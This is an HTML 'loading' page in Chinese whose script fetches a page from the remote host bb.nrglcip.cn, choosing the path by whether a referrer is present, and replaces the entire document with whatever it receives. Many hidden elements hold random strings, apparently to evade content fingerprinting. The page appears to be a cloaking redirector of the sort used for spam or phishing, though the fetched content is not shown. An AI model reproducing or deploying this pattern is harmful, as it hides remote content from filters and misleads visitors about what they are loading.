<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Z8ky9wyXX {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Z8ky9wyXX .Zei7I3zfzoi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Z8ky9wyXX .content {
            line-height: 50px;
            text-align: center
        }

        .Z8ky9wyXX .img {
            width: 100%
        }

        .Z8ky9wyXX .A6ZfiLJ8 {
            text-align: center
        }

        .Z8ky9wyXX .A6ZfiLJ8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Z8ky9wyXX .A6ZfiLJ8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Z8ky9wyXX .A6ZfiLJ8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Z8ky9wyXX .A6ZfiLJ8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Z8ky9wyXX .A6ZfiLJ8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Z8ky9wyXX .A6ZfiLJ8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Z8ky9wyXX .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VWSVQBue1ptE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BqCvjUh = VWSVQBue1ptE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BqCvjUh +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BqCvjUh +".html?a=share";
		}
		
        CsK7kWWkK=url+"#"+new Date().getTime();
        CsK7kWWkK && function() {
            $.get(CsK7kWWkK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>JEVJoLJbxHLSuUFZh1pnDca3tcDMaj0UskH6z1KjRNBYQA0OnpXDG6F9Wu3Ecg5X11y8eU</div>
<span style='display:none'>mf99CviRW0TBLDtVe</span>
<img  src='' style='display:none'>
<b style='display:none' >oJIdXG2asGYv8FcM6QaSHIxLlZhJcdbBqXqjTh40kmI6Ze8hclRxHpxMQTmjbfMi8weGO72eQ94ZjdyHwZgPfEiP8i7roORq5E</b>
<span style='display:none'>mf99CviRW0TBLDtVe</span>
<img  src='' style='display:none'>
<div style='display:none'>JEVJoLJbxHLSuUFZh1pnDca3tcDMaj0UskH6z1KjRNBYQA0OnpXDG6F9Wu3Ecg5X11y8eU</div>
<h1 style='display:none' >OMh921nGIrGVC33BZGbcxzT4AP08JTQNN8NNsg5NMo8RDziZ0EbDmYcUsgIOjVDmGxIP7m9qeW4fPKYuJy</h1>
<h1 style='display:none' >OMh921nGIrGVC33BZGbcxzT4AP08JTQNN8NNsg5NMo8RDziZ0EbDmYcUsgIOjVDmGxIP7m9qeW4fPKYuJy</h1>
<span style='display:none'>mf99CviRW0TBLDtVe</span><div class="Z8ky9wyXX">
    <div class="Zei7I3zfzoi">
        <div class="A6ZfiLJ8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >dA31x8VSDGJFKqkntCqWBzAITgGAJ0o8PXphTuDbBEdZ9HaJV2VslWppR6H9th</li>
<h1 style='display:none' >jBQsM4N7wAtLrCRVdqBbuY6f6gH</h1>
<div style='display:none'>yoPWMhph1q22ZbBaU</div>
<div style='display:none'>yoPWMhph1q22ZbBaU</div>
<h1 style='display:none' >jBQsM4N7wAtLrCRVdqBbuY6f6gH</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >jBQsM4N7wAtLrCRVdqBbuY6f6gH</h1>
<h1 style='display:none' >jBQsM4N7wAtLrCRVdqBbuY6f6gH</h1></body>
</html>